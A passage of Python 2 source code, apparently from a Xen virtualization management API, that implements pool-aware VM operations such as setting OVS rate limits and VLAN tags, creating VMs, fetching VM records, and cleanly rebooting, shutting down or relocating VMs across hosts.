template = True
#log.debug('>>>>>>>eth_num" %s' % eth_num)
except:
eth_num = ''
pass
if eth_num != '':
log.debug('eth_num : %s ' % eth_num)
try:
if not template:
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
#log.debug('other_config: %s' % value)
return self._VM_save(dominfo)
except Exception,exn:
log.debug(exn)
return xen_api_error(['device name invalid', device])
return xen_api_success_void()
def _VM_set_rate_by_ethnum(self, session, vm_ref, param_type, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param eth_num: eth_num of VIF
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('VM_set_%s:%s rate:%s' % ( param_type, eth_num, value))
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
return self._VM_save(dominfo)
#add by wufan
def VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_tag(session, vm_ref, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_tag', vm_ref, tag_list)
else:
return self._VM_set_all_tag(session, vm_ref, tag_list)
#add by wufan
def _VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
log.debug('set vm all tag')
if tag_list is None:
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_tag(session, vm_ref, vif_ref).get('Value')
#log.debug('tag:%s' % str(tag))
self._VM_set_tag( session, vm_ref, vif_ref, tag)
self._VM_update_tag(session, vm_ref, vif_refs)
else:
#tag_list is a dict
#log.debug('tag_list:%s' % tag_list)
for eth_num, tag in tag_list.items():
self._VM_set_tag_by_ethnum(session, vm_ref, eth_num, tag)
return xen_api_success_void()
def VM_set_tag(self, session, vm_ref, vif_ref, value, ovs=None):
'''
@author: wuyuewen
@summary: Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tag', vm_ref, vif_ref, value, ovs)
else:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
#original by wuyuewen
#def _VM_set_tag(self, session, vm_ref, value):
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# domname = dominfo.getName()
# tag = self._VM_get_tag(session, vm_ref).get('Value')
# if tag:
# log.debug('Set vm(%s) vlan: %s' % (domname, value))
# dominfo.set_tag(value)
# return self._VM_add_to_other_config(session, vm_ref, "tag", value)
#add by wufan
def _VM_set_tag(self, session, vm_ref, vif_ref, value, ovs):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xennode = XendNode.instance()
xenapi = self._get_XendAPI_instance()
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
if not xd.is_valid_dev("vif", vif_ref):
return xen_api_error(['VIF_NOT_EXISTS'])
device = self.VIF_get_device(session, vif_ref).get('Value')
bridge = xd.get_dev_property_by_uuid('vif', vif_ref, 'bridge')
# network_org = xd.get_dev_property_by_uuid('vif', vif_ref, 'network')
log.debug('Set vm(%s) %s vlan: %s ovs: %s bridge: %s' %(domname, str(vif_ref), value, ovs, bridge))
# log.debug('vif_ref:%s VM_set_tag:%s vlanid:%s' % (vif_ref, device, value))
eth_num = -1
if device and device.startswith('eth'):
eth_num = device[3:]
else:
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vif_ref in vifs:
eth_num = vifs.index(vif_ref)
if ovs and cmp(ovs, bridge) != 0:
xennode._init_networks()
is_valid_network = xennode.is_valid_network(ovs)
if not is_valid_network:
return xen_api_error(['OVS_NOT_EXISTS'])
network_new = None
list_network_new = xenapi.network_get_by_name_label(session, ovs).get('Value')
if list_network_new:
network_new = list_network_new[0]
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, ovs, bridge)
try:
# rc = self._VIF_set(vif_ref, 'network', network_new, network_org)
rc1 = self._VIF_set(vif_ref, 'bridge', ovs, bridge)
if not rc1:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
return xen_api_error(['VIF_SET_BRIDGE_ERROR'])
except Exception, e:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
raise e
else:
dominfo.set_tag(int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_set_tag_by_ethnum(self, session, vm_ref, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID) by eth_num, this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param eth_num: eth_num of VIF
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s vlan:%s' %(domname, str(eth_num), value))
dominfo.set_tag(int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
return self._VM_save(dominfo)
def VM_remove_from_other_config(self, session, vm_ref, key):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_other_config(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_other_config', vm_ref, key)
else:
return self._VM_remove_from_other_config(session, vm_ref, key)
def _VM_remove_from_other_config(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info \
and key in dom.info['other_config']:
del dom.info['other_config'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_get_crash_dumps(self, _, vm_ref):
'''
@deprecated: not used
'''
return xen_api_todo()
def verify(self, ip):
'''
@deprecated: not used
'''
try:
proxy = ServerProxy("http://" + ip + ":9363/")
response = proxy.session.login('root')
except socket.error:
return False
else:
if cmp(response['Status'], 'Failure') == 0:
return False
return True
def VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_VDI(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_VDI', vm_ref)
else:
return self._VM_get_suspend_VDI(session, vm_ref)
def _VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_VDI(vm_ref))
def VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_SR(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_SR', vm_ref)
else:
return self._VM_get_suspend_SR(session, vm_ref)
def _VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_SR(vm_ref))
# class methods
def VM_get_all_and_consoles(self, session):
'''
@deprecated: not used
'''
VM_and_consoles = {}
for d in XendDomain.instance().list('all'):
vm_uuid = d.get_uuid()
if cmp(vm_uuid, DOM0_UUID) == 0:
continue
dom = XendDomain.instance().get_vm_by_uuid(vm_uuid)
vm_consoles = []
for console in dom.get_consoles():
vm_consoles.append(console)
VM_and_consoles[vm_uuid] = vm_consoles
return xen_api_success(VM_and_consoles)
# def VM_get_all(self, session):
# refs = self._VM_get_all()
# if BNPoolAPI._isMaster:
# host_ref = XendNode.instance().uuid
# for key in BNPoolAPI.get_hosts():
# if cmp(key, host_ref) != 0:
# ip = BNPoolAPI.get_host_ip(key)
# refs += xen_rpc_call(ip, "VM_get_all")
#
# return xen_api_success(refs)
def VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_all(session).get('Value'))
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
# log.debug(remote_ip)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_all').get('Value'))
return xen_api_success(refs)
else:
return self._VM_get_all(session)
def _VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Internal method. Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
refs = [d.get_uuid() for d in XendDomain.instance().list('all')
if d.get_uuid() != DOM0_UUID]
if refs:
return xen_api_success(refs)
else:
return xen_api_success([])
def VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_by_name_label(session, label)['Value'])
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_by_name_label', label)['Value'])
return xen_api_success(refs)
else:
return self._VM_get_by_name_label(session, label)
def _VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Internal method. Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
xendom = XendDomain.instance()
uuids = []
dom = xendom.domain_lookup_by_name_label(label)
if dom:
return xen_api_success([dom.get_uuid()])
return xen_api_success([])
def VM_get_security_label(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
label = dom.get_security_label()
return xen_api_success(label)
def VM_set_security_label(self, session, vm_ref, sec_label, old_label):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
(rc, errors, oldlabel, new_ssidref) = \
dom.set_security_label(sec_label, old_label)
if rc != xsconstants.XSERR_SUCCESS:
return xen_api_error(['SECURITY_ERROR', rc,
xsconstants.xserr2string(-rc)])
if rc == 0:
rc = new_ssidref
return xen_api_success(rc)
def VM_create_on(self, session, vm_struct, host_ref):
'''
@author: wuyuewen
@summary: A Pool range method, create a VM on a Host in Pool.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@param host_ref: VM create on which Host.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
log.debug(vm_struct)
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'VM_create_on', vm_struct, host_ref)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, host_ref)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: A Host range method, create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
log.debug("new vm local uuid : %s", domuuid)
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def _VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: Internal method. Create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def _VM_create_check_vm_uuid_unique(self, newuuid):
if newuuid:
return BNPoolAPI.check_vm_uuid_unique(newuuid)
else:
return True
def VM_create_from_vmstruct(self, session, vm_struct):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def VM_create_from_sxp(self, session, path, start_it=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Create a VM on this Host from .sxp file.
@precondition: sxp file is legal, vm name not duplicated.
@param session: session of RPC.
@param path: path of sxp file
@param start_it: Start the VM after create, if start_it=True, Host must have enough free memory.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
# filename = '/home/share/config.sxp'
try:
sxp_obj = sxp.parse(open(path, 'r'))
sxp_obj = sxp_obj[0]
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.domain_new, sxp_obj)
if update_pool_structs:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
if start_it:
# try:
response = self._VM_start(session, domuuid, False, True)
if cmp(response['Status'], 'Failure') == 0:
self._VM_destroy(session, domuuid, False)
return response
# except Exception, exn:
# self._VM_destroy(session, domuuid, False)
# return xen_api_error(['VM_START_FAILED', 'VM', domuuid])
return response
else:
return xen_api_success(domuuid)
except IOError, e:
return xen_api_error(["Unable to read file: %s" % path])
except Exception, exn:
log.exception(exn)
return xen_api_error(['Create from sxp failed!'])
# finally:
# cmd = 'rm -f %s' % path
# doexec(cmd)
# return XendTask.log_progress(0, 100, do_vm_func,
# "domain_start", domuuid, False, False)
# object methods
def VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
#log.debug('=================vm_get_record:%s' % vm_ref)
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_record(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_record', vm_ref)
else:
return self._VM_get_record(session, vm_ref)
def _VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record = {
'uuid': dom_uuid,
'power_state': xeninfo.get_power_state(),
'name_label': xeninfo.getName(),
'name_description': xeninfo.getNameDescription(),
'user_version': 1,
'is_a_template': xeninfo.info['is_a_template'],
'is_local_vm' : self._VM_get_is_local_vm(session, vm_ref).get("Value", True),
'ip_addr' : xeninfo.getDomainIp(),
'MAC' : xeninfo.getDomainMAC(),
'auto_power_on': xeninfo.info['auto_power_on'],
'resident_on': XendNode.instance().uuid,
'memory_static_min': xeninfo.get_memory_static_min(),
'memory_static_max': xeninfo.get_memory_static_max(),
'memory_dynamic_min': xeninfo.get_memory_dynamic_min(),
'memory_dynamic_max': xeninfo.get_memory_dynamic_max(),
'VCPUs_params': xeninfo.get_vcpus_params(),
'VCPUs_at_startup': xeninfo.getVCpuCount(),
'VCPUs_max': xeninfo.getVCpuCount(),
'actions_after_shutdown': xeninfo.get_on_shutdown(),
'actions_after_reboot': xeninfo.get_on_reboot(),
'actions_after_suspend': xeninfo.get_on_suspend(),
'actions_after_crash': xeninfo.get_on_crash(),
'consoles': xeninfo.get_consoles(),
'VIFs': xeninfo.get_vifs(),
'VBDs': xeninfo.get_vbds(),
'VTPMs': xeninfo.get_vtpms(),
'DPCIs': xeninfo.get_dpcis(),
'DSCSIs': xeninfo.get_dscsis(),
'DSCSI_HBAs': xeninfo.get_dscsi_HBAs(),
'PV_bootloader': xeninfo.info.get('PV_bootloader'),
'PV_kernel': xeninfo.info.get('PV_kernel'),
'PV_ramdisk': xeninfo.info.get('PV_ramdisk'),
'PV_args': xeninfo.info.get('PV_args'),
'PV_bootloader_args': xeninfo.info.get('PV_bootloader_args'),
'HVM_boot_policy': xeninfo.info.get('HVM_boot_policy'),
'HVM_boot_params': xeninfo.info.get('HVM_boot_params'),
'platform': xeninfo.get_platform(),
'PCI_bus': xeninfo.get_pci_bus(),
'tools_version': xeninfo.get_tools_version(),
'other_config': xeninfo.info.get('other_config', {}),
'tags' : xeninfo.info.get('tags', []),
'domid': domid is None and -1 or domid,
'is_control_domain': xeninfo.info['is_control_domain'],
'metrics': xeninfo.get_metrics(),
'cpu_qos': xeninfo.get_cpu_qos(),
'security_label': xeninfo.get_security_label(),
'crash_dumps': [],
'suspend_VDI' : xennode.get_suspend_VDI(dom_uuid),
'suspend_SR' : xennode.get_suspend_SR(dom_uuid),
'connected_disk_SRs' : xennode.get_connected_disk_sr(dom_uuid),
'connected_iso_SRs' : xennode.get_connected_iso_sr(dom_uuid),
'pool_name': xeninfo.info.get('pool_name'),
# 'cpu_pool' : XendCPUPool.query_pool_ref(xeninfo.get_cpu_pool()),
}
#log.debug(record)
return xen_api_success(record)
# def VM_get_record_lite(self, session, vm_ref=''):
# if BNPoolAPI._isMaster:
# hosts = self.host_get_all(session).get('Value', '')
# node = XendNode.instance()
# records = []
# if hosts:
# for host in hosts:
# if cmp(node.uuid, host) == 0:
# records.append(self._VM_get_record_lite(session))
# else:
# host_ip = BNPoolAPI.get_host_ip(host)
# records.append(xen_rpc_call(host_ip, 'VM_get_record_lite', '').get('Value', []))
# return xen_api_success(records)
# else:
# return xen_api_success(self._VM_get_record_lite(session))
def VM_get_record_lite(self, session, vm_ref=''):
'''
@deprecated: not used
'''
vms = self._VM_get_all(session).get('Value', [])
retv = []
if vms:
for vm_ref in vms:
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
# xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
# domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record_lite = {'uuid' : dom_uuid,
'power_state' : xeninfo.get_power_state(),
}
# log.debug(record_lite)
retv.append(record_lite)
return xen_api_success(retv)
def VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_reboot", vm_ref)
return response
else:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
return response
def _VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "reboot")
return xen_api_success_void()
def _VM_reboot_checkout(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Checkout when reboot operation finish, VM_ID = VM_ID + 1.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
domid_old = self.VM_get_domid(session, vm_ref)['Value']
i = 0
flag = False
one_more = True
while True:
i += 1
domid_new = self.VM_get_domid(session, vm_ref)['Value']
if cmp(int(domid_new), int(domid_old)) > 0:
log.debug('reboot finished: %s, cost time: %s' % (vm_ref, str(i)))
flag = True
break
elif cmp(i, 90) > 0 and cmp(int(domid_new), -1) == 0 or not domid_new:
if one_more:
one_more = False
i -= 6
continue
else:
log.exception('reboot timeout!')
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
def VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_shutdown(session,vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_shutdown", vm_ref)
return response
else:
response = self._VM_clean_shutdown(session, vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
return response
def _VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
is_a_template = self._VM_get_is_a_template(session, vm_ref).get('Value')
if is_a_template:
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "poweroff")
return xen_api_success_void()
def _VM_shutdown_checkout(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Checkout when shutdown operation finish.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
i = 0
time_out = 60
flag = False
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref).get('Value')
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
log.debug("shutdown finished: %s, cost time: %s" % (vm_ref, str(i)))
flag = True
break
elif cmp(i, time_out) > 0:
log.exception("shutdown timeout!")
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
'''
when VM create from template, migrate VM to destinate host
VM is shutdown, refer to VM_start_on
'''
def VM_change_host(self, session, vm_ref, temp_ref, host_ref, path):
'''
@author: wuyuewen
@summary: When VM create from template, migrate VM to destinate host, refer to VM_create_on_from_template.
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: VM's uuid
@param temp_ref: VM template uuid
@param host_ref: migrate VM to which host
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED
'''
try:
log.debug("in VM_change_host: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_api_success(True)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if not h_ref:
log.exception('Get host by VM failed! BNPoolAPI update_data_struct not sync!')
h_ref = BNPoolAPI.get_host_by_vm(temp_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_migrate to ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
log.debug("<dest ip>, <host ip>: <%s>, <%s>" % (host_ip, h_ip))
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = {'Status' : 'Success', 'Value' : vm_ref}
# return xen_api_success(True)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, False, False)
# log.debug('create from template: %s' % response)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
# log.debug('destroy : %s' % response)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
log.debug("vm dest: node, vm now: master")
log.debug("host ip (%s) path(%s)" % (host_ip, path))
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = {'Status' : 'Success', 'Value' : vm_ref}
else:
log.debug("-----condition 5-----")
